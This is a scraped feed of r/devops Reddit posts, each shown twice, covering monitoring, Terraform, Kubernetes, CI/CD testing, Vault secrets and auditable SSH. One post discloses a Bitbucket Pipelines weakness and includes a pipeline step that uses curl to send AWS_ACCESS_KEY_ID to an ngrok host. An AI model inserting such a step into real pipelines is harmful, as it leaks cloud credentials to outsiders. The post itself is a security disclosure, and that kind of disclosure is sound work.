Full monitoring in one place with Grafana and Kubernetes (+100 instances)
I have over 100 instances on AWS. I want full monitoring in one place - Kubernetes cluster with Grafana.
My question is, what do you think about generating dashboards (IaaC) with CPU/RAM/IOps usage views for so many instances?
Is it a good idea to use helm for that and then somehow switch values so that it can fetch data from other instances and create charts on a per-instance basis?
Perhaps one dashboard with one chart, which shows all of CPU usage, another with RAM etc.?
What solutions worked for you in such a scenario?
https://redd.it/ls0f9l
@r_devops
I have over 100 instances on AWS. I want full monitoring in one place - Kubernetes cluster with Grafana.
My question is, what do you think about generating dashboards (IaaC) with CPU/RAM/IOps usage views for so many instances?
Is it a good idea to use helm for that and then somehow switch values so that it can fetch data from other instances and create charts on a per-instance basis?
Perhaps one dashboard with one chart, which shows all of CPU usage, another with RAM etc.?
What solutions worked for you in such a scenario?
https://redd.it/ls0f9l
@r_devops
reddit
Full monitoring in one place with Grafana and Kubernetes (+100...
I have over 100 instances on AWS. I want full monitoring in one place - Kubernetes cluster with Grafana. My question is, what do you think about...
CKA/CKAD still worthwhile?
My company is offering to pay for my training and exams. I have no k8s experience, so I think I'm going to go for it, if for nothing else just to learn the tech. Just curious if these certs are actually held in high regard?
https://redd.it/lroeh7
@r_devops
My company is offering to pay for my training and exams. I have no k8s experience, so I think I'm going to go for it, if for nothing else just to learn the tech. Just curious if these certs are actually held in high regard?
https://redd.it/lroeh7
@r_devops
reddit
CKA/CKAD still worthwhile?
My company is offering to pay for my training and exams. I have no k8s experience, so I think I'm going to go for it, if for nothing else just...
Terraform EC2 post deploy configuration
Wondering if anyone can share their ideas on getting config files and installing packages on new EC2 instances provisioned using terraform.
options considered:
\- baking packages into AMI & deploying config files to EC2 instance using Terraform
\- using Terraform to run post exec hooks on the EC2 instance after deploy
\- using Ansible to deploy scripts and packages to EC2 instance after deploy
These seem to be the only ways to keep the configuration of the instance located with the IAC package, I'm a little fuzzy on how I would execute these solutions so any advice if you have done it before or think it's a good idea would be useful.
Would like to avoid deploying supporting resources like a chef or puppet server.
https://redd.it/lrniza
@r_devops
Wondering if anyone can share their ideas on getting config files and installing packages on new EC2 instances provisioned using terraform.
options considered:
\- baking packages into AMI & deploying config files to EC2 instance using Terraform
\- using Terraform to run post exec hooks on the EC2 instance after deploy
\- using Ansible to deploy scripts and packages to EC2 instance after deploy
These seem to be the only ways to keep the configuration of the instance located with the IAC package, I'm a little fuzzy on how I would execute these solutions so any advice if you have done it before or think it's a good idea would be useful.
Would like to avoid deploying supporting resources like a chef or puppet server.
https://redd.it/lrniza
@r_devops
reddit
Terraform EC2 post deploy configuration
Wondering if anyone can share their ideas on getting config files and installing packages on new EC2 instances provisioned using...
Terraform EC2 post configuration
Wondering if anyone can share their ideas on getting config files and installing packages on new EC2 instances provisioned using terraform.
options considered:
\- baking packages into AMI & deploying config files to EC2 instance using Terraform
\- using Terraform to run post exec hooks on the EC2 instance after deploy
\- using Ansible to deploy scripts and packages to EC2 instance after deploy
These seem to be the only ways to keep the configuration of the instance located with the IAC package, I'm a little fuzzy on how I would execute these solutions so any advice if you have done it before or think it's a good idea would be useful.
Would like to avoid deploying supporting resources like a chef or puppet server.
https://redd.it/lrmwgk
@r_devops
Wondering if anyone can share their ideas on getting config files and installing packages on new EC2 instances provisioned using terraform.
options considered:
\- baking packages into AMI & deploying config files to EC2 instance using Terraform
\- using Terraform to run post exec hooks on the EC2 instance after deploy
\- using Ansible to deploy scripts and packages to EC2 instance after deploy
These seem to be the only ways to keep the configuration of the instance located with the IAC package, I'm a little fuzzy on how I would execute these solutions so any advice if you have done it before or think it's a good idea would be useful.
Would like to avoid deploying supporting resources like a chef or puppet server.
https://redd.it/lrmwgk
@r_devops
reddit
Terraform EC2 post configuration
Wondering if anyone can share their ideas on getting config files and installing packages on new EC2 instances provisioned using...
How do i manage several processes - without containers
Since it's 2021, the standard way of running several processes across a number of virtual machines is to run them in containers under Kubernetes. That enables automatic monitoring of the processes, failover, scaling, and all those good things.
But before containers were a thing (or even today, because containers and Kubernetes add a level of complexity that you may not want or need), how would you manage several running processes on a server cluster? Starting new processes on the machine with enough capacity, reporting if they fail, restarting, etc. -- there surely must be some tools for that, similar to what you get with Kubernetes but with standard Linux processes instead of containers.
https://redd.it/lrmfis
@r_devops
Since it's 2021, the standard way of running several processes across a number of virtual machines is to run them in containers under Kubernetes. That enables automatic monitoring of the processes, failover, scaling, and all those good things.
But before containers were a thing (or even today, because containers and Kubernetes add a level of complexity that you may not want or need), how would you manage several running processes on a server cluster? Starting new processes on the machine with enough capacity, reporting if they fail, restarting, etc. -- there surely must be some tools for that, similar to what you get with Kubernetes but with standard Linux processes instead of containers.
https://redd.it/lrmfis
@r_devops
reddit
How do i manage several processes - without containers
Since it's 2021, the standard way of running several processes across a number of virtual machines is to run them in containers under Kubernetes....
Auditable SSH access to server maintenance + Jenkins jobs
We deploy and manage services/servers for lots of different customers and we need to comply with new regulatory requirements for auditability.
For most of the "manual" maintenance tasks we can just use a bastion server with SSH sessions recordings, automatic keys assignments, directory auth and 2FA, all of that, no problem. But when it comes to the jobs going through Jenkins, things become cloudy.
We have a few Jenkins nodes (agents) around but most of the deployments go through SSH (ansible, rsync etc). We can't just have the same rule applied here (who is going to type in 2FA code all the time a job runs ;-) but at least we must be able to concentrate those accesses in the bastion and keep track of those activities as well, apart from Jenkins or repository audit.
Is this something you guys have been through?
https://redd.it/lrlrt2
@r_devops
We deploy and manage services/servers for lots of different customers and we need to comply with new regulatory requirements for auditability.
For most of the "manual" maintenance tasks we can just use a bastion server with SSH sessions recordings, automatic keys assignments, directory auth and 2FA, all of that, no problem. But when it comes to the jobs going through Jenkins, things become cloudy.
We have a few Jenkins nodes (agents) around but most of the deployments go through SSH (ansible, rsync etc). We can't just have the same rule applied here (who is going to type in 2FA code all the time a job runs ;-) but at least we must be able to concentrate those accesses in the bastion and keep track of those activities as well, apart from Jenkins or repository audit.
Is this something you guys have been through?
https://redd.it/lrlrt2
@r_devops
reddit
Auditable SSH access to server maintenance + Jenkins jobs
We deploy and manage services/servers for lots of different customers and we need to comply with new regulatory requirements for...
Azure DevOps lefthand menu. #HATEPOST
Please. Anyone.
Does anyone know how to stop the hover over functionality of the left hand navigation menu?
https://imgur.com/KMt0M9U
I keep accidently taking my hand off my mouse, which then falls onto one of these icons, meanwhile I go to type and end up leaving the page without saving.
Fucking awful design.
https://redd.it/lsyyvx
@r_devops
Please. Anyone.
Does anyone know how to stop the hover over functionality of the left hand navigation menu?
https://imgur.com/KMt0M9U
I keep accidently taking my hand off my mouse, which then falls onto one of these icons, meanwhile I go to type and end up leaving the page without saving.
Fucking awful design.
https://redd.it/lsyyvx
@r_devops
Imgur
Post with 0 votes and 91 views.
(Free) Bitbucket pipelines can leak your credential
Lately I has been working with a Free version of Bitbucket Pipeline to apply for my side project. The more I work with it, the more I see the pipeline as a security risk, expecially in the repository with contractor type dev.
So today I do some testing to confirm my hypnosis.
The project setup:
I have a repo with dev and main branch, these branches can only be merge/write with admin account.
We have some credential in `Repositories Variables` and some in `Deployment Variables`, one of them is AWS_ACCESS_KEY_ID and we already mark it as secured in the setting
As bitbucket-pipelines.yml file can be change in feature branch, developer can add new pipelines rule to trigger pipeline for that specific branch only:
ex:
```
definitions:
steps:
- step: &build-deploy
pipelines:
branches:
dev:
- step:
<<: *build-deploy
deployment: staging
master:
- step:
<<: *build-deploy
deployment: production
# start malice changes
test-hack-pipeline:
- step:
script:
- >-
curl --header "Content-Type: application/json"
--request POST
--data "{\"username\":\"${AWS_ACCESS_KEY_ID}\"}"
https://9d756c9f91e2.ngrok.io
# end malice changes
```
With just a little bit of change, I can extract a "Repositories Variables". There no thing to prevent I extends that script to capture all the other enviroment variables.
In case of `Deployment Variables`, those value can be proteced by the premium feature call `Deployment permissions`, where we can restrict the deployment variables access from unproteted branch.
So if you don't trust your dev, definately upgrade to premium and move all credential into `Deployment Variables`
https://redd.it/lt5eic
@r_devops
Lately I has been working with a Free version of Bitbucket Pipeline to apply for my side project. The more I work with it, the more I see the pipeline as a security risk, expecially in the repository with contractor type dev.
So today I do some testing to confirm my hypnosis.
The project setup:
I have a repo with dev and main branch, these branches can only be merge/write with admin account.
We have some credential in `Repositories Variables` and some in `Deployment Variables`, one of them is AWS_ACCESS_KEY_ID and we already mark it as secured in the setting
As bitbucket-pipelines.yml file can be change in feature branch, developer can add new pipelines rule to trigger pipeline for that specific branch only:
ex:
```
definitions:
steps:
- step: &build-deploy
pipelines:
branches:
dev:
- step:
<<: *build-deploy
deployment: staging
master:
- step:
<<: *build-deploy
deployment: production
# start malice changes
test-hack-pipeline:
- step:
script:
- >-
curl --header "Content-Type: application/json"
--request POST
--data "{\"username\":\"${AWS_ACCESS_KEY_ID}\"}"
https://9d756c9f91e2.ngrok.io
# end malice changes
```
With just a little bit of change, I can extract a "Repositories Variables". There no thing to prevent I extends that script to capture all the other enviroment variables.
In case of `Deployment Variables`, those value can be proteced by the premium feature call `Deployment permissions`, where we can restrict the deployment variables access from unproteted branch.
So if you don't trust your dev, definately upgrade to premium and move all credential into `Deployment Variables`
https://redd.it/lt5eic
@r_devops
For dev's looking for grants to develop apps around crypto
just wanted to drop this here if anyone is interested. The Kin Foundation is offering grants to developers that want to join the Kin ecosystem through the catalyst fund. why work for free when Kin will pay you and support you?
https://kin.org/catalyst-fund/
https://www.reddit.com/r/KinFoundation/
https://redd.it/lt9msx
@r_devops
just wanted to drop this here if anyone is interested. The Kin Foundation is offering grants to developers that want to join the Kin ecosystem through the catalyst fund. why work for free when Kin will pay you and support you?
https://kin.org/catalyst-fund/
https://www.reddit.com/r/KinFoundation/
https://redd.it/lt9msx
@r_devops
Twitter
$KIN - Twitter Search / Twitter
The latest Tweets on $KIN. Read what people are saying and join the conversation.
Deep linking Question (in videos)
Hey, all! First time poster here. Please let me know if this is on the wrong board.
Do you guys happen to know of any meta documentation tools/platforms/plugins/etc.?
i.e. if someone were to search “marital issues” inside of our site/platform, our platform would allow us the ability to deep link into specific video timestamps where our video subjects would mention “marital issues” without playing the high-level video from the beginning.
Thanks in advance! 🙂
https://redd.it/ltatys
@r_devops
Hey, all! First time poster here. Please let me know if this is on the wrong board.
Do you guys happen to know of any meta documentation tools/platforms/plugins/etc.?
i.e. if someone were to search “marital issues” inside of our site/platform, our platform would allow us the ability to deep link into specific video timestamps where our video subjects would mention “marital issues” without playing the high-level video from the beginning.
Thanks in advance! 🙂
https://redd.it/ltatys
@r_devops
reddit
Deep linking Question (in videos)
Hey, all! First time poster here. Please let me know if this is on the wrong board. Do you guys happen to know of any meta documentation...
Assistance hashing out testing in CI/CD pipeline
I built this graphic primarily to help myself wrap my brain around how to implement testing in the CI/CD pipelines I'm building. Seeking assistance and input on it to see where I'm wrong, what is missing, what is / isn't necessary, etc.
https://imgur.com/a/6eMnVcd
https://imgur.com/a/PiQ9Kp0
My primary questions are the following:
1. The biggest one: Does this look right? Am I missing steps? Are any of them not necessary?
2. I really haven't quite wrapped my brain around how to do the integration testing. Really, just
3. Any other suggestions?
I'm trying to implement good practices. Our's are currently... not great. We do have pipelines setup, but all of the testing is manual: test in dev, PR and deploy to staging, manual test in staging, PR and merge to production, manual testing of production.
My end goal is to have the PR trigger a pipeline to run tests and merge if they all pass, which triggers the deployment to production.
As always, I appreciate the help!
https://redd.it/lsytih
@r_devops
I built this graphic primarily to help myself wrap my brain around how to implement testing in the CI/CD pipelines I'm building. Seeking assistance and input on it to see where I'm wrong, what is missing, what is / isn't necessary, etc.
https://imgur.com/a/6eMnVcd
https://imgur.com/a/PiQ9Kp0
My primary questions are the following:
1. The biggest one: Does this look right? Am I missing steps? Are any of them not necessary?
2. I really haven't quite wrapped my brain around how to do the integration testing. Really, just
/ and /api, and /admin and /api, need integration testing, but not 100% sure how to go about this: docker-compose, another k8s cluster in a VM like the unit tests, etc?3. Any other suggestions?
I'm trying to implement good practices. Our's are currently... not great. We do have pipelines setup, but all of the testing is manual: test in dev, PR and deploy to staging, manual test in staging, PR and merge to production, manual testing of production.
My end goal is to have the PR trigger a pipeline to run tests and merge if they all pass, which triggers the deployment to production.
As always, I appreciate the help!
https://redd.it/lsytih
@r_devops
Imgur
Post with 2 views.
Alternate to AWS Fargate in Microsoft Azure
What is the alternative to AWS Fargate in Azure
https://redd.it/lt3nf2
@r_devops
What is the alternative to AWS Fargate in Azure
https://redd.it/lt3nf2
@r_devops
reddit
Alternate to AWS Fargate in Microsoft Azure
What is the alternative to AWS Fargate in Azure
Docker like dedicated to Embedded System
Hi there! :)
I've just launched the new release of an open source and real-time embedded software named Luos.
Luos is like Docker, but dedicated to embedded systems. In other, words Luos is an open source and real-time architecture for designing, testing, and deploying embedded applications.
It could be great if you try it, and give me some feedback (I really need feedback) ➔ https://docs.luos.io
Of course I'm here if you need help :D
https://redd.it/lt1h9x
@r_devops
Hi there! :)
I've just launched the new release of an open source and real-time embedded software named Luos.
Luos is like Docker, but dedicated to embedded systems. In other, words Luos is an open source and real-time architecture for designing, testing, and deploying embedded applications.
It could be great if you try it, and give me some feedback (I really need feedback) ➔ https://docs.luos.io
Of course I'm here if you need help :D
https://redd.it/lt1h9x
@r_devops
Observability with infrastructure as code
I recently guest wrote a post on pulumi's website about using their Automation API to give myself much deeper insights into cloud resource creation.
I am currently using this with tooling where users can request foundational infrastructure through a webui, where it will create all the needed bits (e.g. vpc, peerings, flow logs, authentication, and a optionally a basic environment of RDS, ECS etc.) and as part of this process, it takes generated credentials and stores them in a Vault instance. The issue I had was when something failed to create, I had a hard time seeing what and why, and if something was taking longer than usual (such as a security group deletion hanging around indefinitely).
The tech used is pulumi and honeycomb, but other providers could be used but might be more effort (e.g. parsing terraform output to generate the spans).
https://www.pulumi.com/blog/observability-with-infrastructure-as-code/
https://redd.it/lswm6f
@r_devops
I recently guest wrote a post on pulumi's website about using their Automation API to give myself much deeper insights into cloud resource creation.
I am currently using this with tooling where users can request foundational infrastructure through a webui, where it will create all the needed bits (e.g. vpc, peerings, flow logs, authentication, and a optionally a basic environment of RDS, ECS etc.) and as part of this process, it takes generated credentials and stores them in a Vault instance. The issue I had was when something failed to create, I had a hard time seeing what and why, and if something was taking longer than usual (such as a security group deletion hanging around indefinitely).
The tech used is pulumi and honeycomb, but other providers could be used but might be more effort (e.g. parsing terraform output to generate the spans).
https://www.pulumi.com/blog/observability-with-infrastructure-as-code/
https://redd.it/lswm6f
@r_devops
pulumi
Observability with Infrastructure as Code
Andy Davies from Reaktor introduces observability into infrastructure as code with the Pulumi Automation API
Dynatrace as a DevOps Tool
Does anyone use Dynatrace for DevOps. We are traditional devops and support the software but we are also doing internal devops. I like the tool and it does say it works well with ADO but I am only seeing developmental uses not necessarily devops uses. Any advice would be appreciated! (2 years in devops)
https://redd.it/lt0814
@r_devops
Does anyone use Dynatrace for DevOps. We are traditional devops and support the software but we are also doing internal devops. I like the tool and it does say it works well with ADO but I am only seeing developmental uses not necessarily devops uses. Any advice would be appreciated! (2 years in devops)
https://redd.it/lt0814
@r_devops
reddit
Dynatrace as a DevOps Tool
Does anyone use Dynatrace for DevOps. We are traditional devops and support the software but we are also doing internal devops. I like the tool...
Manual actions that you wish were automated
First time poster here, so take it easy on me! While I'm not a developer myself, I work closely with a group of team members that are strongly focused on DevOps culture. I've spent quite some time recently researching why & how companies implement DevOps methodologies. While there's so much more for me to learn, the main concept I keep coming back to is automation. Specifically how important it is to bridging the gap between development & operations, and how it significantly improves delivery of features & functionality to customers.
I'm going to continue to engage with my team members on some the questions below, but I'm curious to hear from a larger audience:
* What are some actions you take that you wish were automated?
* Are those actions related to the general delivery pipeline, troubleshooting, or generating regular feedback?
* What's prohibited you or your team from automating those actions to reduce time & efforts?
https://redd.it/lt010g
@r_devops
First time poster here, so take it easy on me! While I'm not a developer myself, I work closely with a group of team members that are strongly focused on DevOps culture. I've spent quite some time recently researching why & how companies implement DevOps methodologies. While there's so much more for me to learn, the main concept I keep coming back to is automation. Specifically how important it is to bridging the gap between development & operations, and how it significantly improves delivery of features & functionality to customers.
I'm going to continue to engage with my team members on some the questions below, but I'm curious to hear from a larger audience:
* What are some actions you take that you wish were automated?
* Are those actions related to the general delivery pipeline, troubleshooting, or generating regular feedback?
* What's prohibited you or your team from automating those actions to reduce time & efforts?
https://redd.it/lt010g
@r_devops
reddit
Manual actions that you wish were automated
First time poster here, so take it easy on me! While I'm not a developer myself, I work closely with a group of team members that are strongly...
SigNoz - an open source alternative to DataDog
Hi everyone! Together with my brother I've been working on SigNoz for the past few months. It's built on ReactTS and Go, and based on Kafka & druid underneath.
Here’s our github repo: https://github.com/SigNoz/signoz
As of now, we have focused on providing a seamless experience between metrics and traces, and plan to add logs in the coming months as opentelemetry logs matures (currently in alpha). SigNoz supports custom aggregates on filtered traces - and much sophisticated filtering as we use druid underneath
We recently released an initial version. Would love any thoughts on if this would something which would be useful for you or how we can make it better for folks here?
https://redd.it/lsza5s
@r_devops
Hi everyone! Together with my brother I've been working on SigNoz for the past few months. It's built on ReactTS and Go, and based on Kafka & druid underneath.
Here’s our github repo: https://github.com/SigNoz/signoz
As of now, we have focused on providing a seamless experience between metrics and traces, and plan to add logs in the coming months as opentelemetry logs matures (currently in alpha). SigNoz supports custom aggregates on filtered traces - and much sophisticated filtering as we use druid underneath
We recently released an initial version. Would love any thoughts on if this would something which would be useful for you or how we can make it better for folks here?
https://redd.it/lsza5s
@r_devops
GitHub
GitHub - SigNoz/signoz: SigNoz is an open-source observability platform native to OpenTelemetry with logs, traces and metrics in…
SigNoz is an open-source observability platform native to OpenTelemetry with logs, traces and metrics in a single application. An open-source alternative to DataDog, NewRelic, etc. 🔥 🖥. 👉 Open s...
[Upcoming webinar] Using observability to scale AWS Lambda
In this 45-minute webinar we'll be discussing how to **utilize observability to optimize your Lambdas for scale and maintain their performance over time** \- from development to production to scabability.
What you'll learn:
* How do you spot potentially **slow-running Lambda functions** and how do to **power-tune** **them in development**?
* **Load testing** and how you need a **good observability** tool for when you do load testing? How to do load testing?
* How to use observability and **make crucial data available in production** and at scale?
* **Observability best practices** and common mistakes.
* SRE maintenance and **keeping your infrastructure performance healthy** in the long-term.
Presenters: **Ben Ellerby** (AWS serverless hero and VP of engineering at Theodo), **Alexander White**, Full-Stack Mobile and Web Engineer at Theodo and **Taavi Rehemägi**, CEO and Co-Founder at Dashbird.
RSVP here: [https://sls.dashbird.io/lambda-observability-webinar](https://sls.dashbird.io/lambda-observability-webinar)
https://redd.it/ltjumi
@r_devops
In this 45-minute webinar we'll be discussing how to **utilize observability to optimize your Lambdas for scale and maintain their performance over time** \- from development to production to scabability.
What you'll learn:
* How do you spot potentially **slow-running Lambda functions** and how do to **power-tune** **them in development**?
* **Load testing** and how you need a **good observability** tool for when you do load testing? How to do load testing?
* How to use observability and **make crucial data available in production** and at scale?
* **Observability best practices** and common mistakes.
* SRE maintenance and **keeping your infrastructure performance healthy** in the long-term.
Presenters: **Ben Ellerby** (AWS serverless hero and VP of engineering at Theodo), **Alexander White**, Full-Stack Mobile and Web Engineer at Theodo and **Taavi Rehemägi**, CEO and Co-Founder at Dashbird.
RSVP here: [https://sls.dashbird.io/lambda-observability-webinar](https://sls.dashbird.io/lambda-observability-webinar)
https://redd.it/ltjumi
@r_devops
sls.dashbird.io
Using observability to scale AWS Lambda [Webinar]
Using observability to scale AWS Lambda webinar. How to optimize your Lambdas for scale and maintain their performance over time.
Build k8 cluster from scratch, IaC and CI/CD choice?
Hi!
I'm involved in a startup and we are going to build a new k8 cluster with Openshift Container platform on IBM cloud (dont ask why :D). The cluster will host databases, websites, mobile apps, middlelayers apps, developed with javascript, java and python. In the future we will implement kafka/event streams as well. My questions to you here:
1. What IaC tools would you use in order to manage the cluster? Been looking into terraform to manage infrastructure
2. What CI/CD tools would you use in order to connect github with kubernetes cluster?
3. What monitoring and issue trackers do you have good experiences with?
4. What IaC tools, CI/CD tools and other "DevOps" tools to you have bad experience with? Just so I know what to watch out for. Could be cost related, bugs, features, functionality etc.
All opinions are welcome. Thank you.
Best regards,
oscillate123
https://redd.it/lsyaj7
@r_devops
Hi!
I'm involved in a startup and we are going to build a new k8 cluster with Openshift Container platform on IBM cloud (dont ask why :D). The cluster will host databases, websites, mobile apps, middlelayers apps, developed with javascript, java and python. In the future we will implement kafka/event streams as well. My questions to you here:
1. What IaC tools would you use in order to manage the cluster? Been looking into terraform to manage infrastructure
2. What CI/CD tools would you use in order to connect github with kubernetes cluster?
3. What monitoring and issue trackers do you have good experiences with?
4. What IaC tools, CI/CD tools and other "DevOps" tools to you have bad experience with? Just so I know what to watch out for. Could be cost related, bugs, features, functionality etc.
All opinions are welcome. Thank you.
Best regards,
oscillate123
https://redd.it/lsyaj7
@r_devops
reddit
Build k8 cluster from scratch, IaC and CI/CD choice?
Hi! I'm involved in a startup and we are going to build a new k8 cluster with Openshift Container platform on IBM cloud (dont ask why :D). The...
Chicken or the egg?
Teaching myself about devops, and Im kind of stuck in a what comes first point of view. If we take a conversation at a high level of considering an aws infrastructure thats along the lines of:
* terraform managed instances
* ansible managing software installs
* kubernetes managing the microservices
* ci/cd using jenkins
* logging / metrics using elastic
Its my understanding, that in terms of setting this up:
terraform will create all the instances (the masters, workers, jenkins instance, etc). ansible will install / configure kubernetes, jenkins, elastic. jenkins will then take charge of deploying all the services to kubernetes.
Am i far off in my high level overview? Is the order of how things would happen incorrect?
https://redd.it/lsopxk
@r_devops
Teaching myself about devops, and Im kind of stuck in a what comes first point of view. If we take a conversation at a high level of considering an aws infrastructure thats along the lines of:
* terraform managed instances
* ansible managing software installs
* kubernetes managing the microservices
* ci/cd using jenkins
* logging / metrics using elastic
Its my understanding, that in terms of setting this up:
terraform will create all the instances (the masters, workers, jenkins instance, etc). ansible will install / configure kubernetes, jenkins, elastic. jenkins will then take charge of deploying all the services to kubernetes.
Am i far off in my high level overview? Is the order of how things would happen incorrect?
https://redd.it/lsopxk
@r_devops
reddit
Chicken or the egg?
Teaching myself about devops, and Im kind of stuck in a what comes first point of view. If we take a conversation at a high level of considering...
How do you manage the secrets that your code needs from Hashicorp Vault?
I'm assuming your Vault instance already has a lot of secrets in separate folders. Now your code needs to fetch these secrets but not all of them. Suppose you need folder1/subfolder1/secret1/key1 and folder2/subfolder2/secret2/key2.
How do you keep these dependencies in your code? Do you have something like a
my_dependencies.yml which is read by your code and it queries based on that --
- requiredvaultsecrets:
folder1:
subfolder1:
secret1:
- key1
folder2:
subfolder2:
secret2:
- key2
https://redd.it/lsmomy
@r_devops
I'm assuming your Vault instance already has a lot of secrets in separate folders. Now your code needs to fetch these secrets but not all of them. Suppose you need folder1/subfolder1/secret1/key1 and folder2/subfolder2/secret2/key2.
How do you keep these dependencies in your code? Do you have something like a
my_dependencies.yml which is read by your code and it queries based on that --
- requiredvaultsecrets:
folder1:
subfolder1:
secret1:
- key1
folder2:
subfolder2:
secret2:
- key2
https://redd.it/lsmomy
@r_devops
reddit
How do you manage the secrets that your code needs from Hashicorp...
I'm assuming your Vault instance already has a lot of secrets in separate folders. Now your code needs to fetch these secrets but not all of them....